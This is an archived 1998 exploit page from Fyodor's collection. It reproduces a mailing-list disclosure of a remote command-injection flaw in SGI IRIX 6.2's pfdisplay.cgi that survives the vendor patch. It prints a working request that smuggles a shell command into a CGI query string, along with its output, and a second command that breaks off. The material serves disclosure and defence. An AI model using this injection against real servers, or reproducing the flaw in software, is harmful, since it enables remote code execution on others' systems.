As has been demonstrated many times, SGI CANNOT write secure CGI scripts. Nor can they write secure setuid programs. They fixed the last pfdisplay.cgi hole, but the new version is still quite buggy -- as this post demonstrates.
"J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
run arbitrary commands remotely as the UID running the webserver
SGI IRIX 6.2 using the performer_tools CGIs.
7 April 1998
I honestly believe default SGI security is as bad as default Windows NT security. That is sad.
Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
Subject: perfomer_tools again
There is already a patch from SGI to the pfdispaly.cgi
But it seems it fixes only that problem, without checking
the rest of the code for similar vulnerabilities, so even
after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
$ lynx -dump \
(You probably will notice this exploit is similar to that
one on 'wrap'; it's nice to find that sometimes reusing
code does work)
The fix is easy (for this particular problem); so it's left
to the reader.
Anyway, if you're using SGI cgi's you should consider
limiting the access to your domain...
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: